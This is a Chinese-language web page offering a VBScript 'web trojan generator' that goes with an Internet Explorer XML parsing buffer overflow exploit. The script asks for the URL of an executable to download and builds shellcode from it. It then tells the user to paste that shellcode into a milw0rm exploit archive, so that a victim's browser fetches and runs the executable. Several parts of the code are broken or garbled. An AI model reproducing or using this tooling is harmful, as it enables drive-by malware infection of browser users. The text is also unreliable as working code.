主頁(yè) > 知識(shí)庫(kù) > 網(wǎng)馬生成器 MS Internet Explorer XML Parsing Buffer Overflow Exploit (vista) 0day

網(wǎng)馬生成器 MS Internet Explorer XML Parsing Buffer Overflow Exploit (vista) 0day

'code by lcx

On Error Resume Next
Exeurl = InputBox( "請(qǐng)輸入exe的地址:", "輸入", "http://www.haiyangtop.net/333.exe" )

Body = getHTTPPage(url)
Set Re = New RegExp
Re.Pattern = "(\$shellcode \=[\s\S]+/div>/pre>)"

Set Matches = Re.Execute(Body)
If Matches.Count>0 Then Body = Matches(0).value

code=Trim(Replace(Replace(replace(Replace(Replace(Replace(Replace(Body,"$shellcode =",""),Chr(34),""),Chr(13),""),";",""),"/div>/pre>",""),Chr(10),""),".",""))

function replaceregex(str)
set regex=new regExp
end Function

Function getHTTPPage(Path)
t = GetBody(Path)
getHTTPPage = BytesToBstr(t, "GB2312")
End Function

Function GetBody(url)
On Error Resume Next
Set Retrieval = CreateObject("Microsoft.XMLHTTP")
With Retrieval
.Open "Get", url, False, "", ""
GetBody = .ResponseBody
End With
Set Retrieval = Nothing
End Function

Function BytesToBstr(Body, Cset)
Dim objstream
Set objstream = CreateObject("adodb.stream")
objstream.Type = 1
objstream.Mode = 3
objstream.Write Body
objstream.Position = 0
objstream.Type = 2
objstream.Charset = Cset
BytesToBstr = objstream.ReadText
Set objstream = Nothing
End Function

Function URLEncoding(vstrIn)
strReturn = ""
For aaaa = 1 To Len(vstrIn)
ThisChr = Mid(vStrIn,aaaa,1)
If Abs(Asc(ThisChr)) HFF Then
strReturn = strReturn ThisChr
innerCode = Asc(ThisChr)
If innerCode 0 Then
innerCode = innerCode + H10000
End If
Hight8 = (innerCode And HFF00)\ HFF
Low8 = innerCode And HFF
strReturn = strReturn "%" Hex(Hight8) "%" Hex(Low8)
End If
URLEncoding = strReturn
End Function

set fso=CreateObject("scripting.filesystemobject")
set fileS=fso.opentextfile("a.txt",2,true)
fileS.writeline replaceregex(code)
'fileS.writeline body
wscript.echo replaceregex(code)
set fso=Nothing

wscript.echo Chr(13)"ok,生成a.txt,請(qǐng)用a.txt里的替換http://milw0rm.com/sploits/2008-iesploit.tar.gz里的shellcode1內(nèi)容即可"

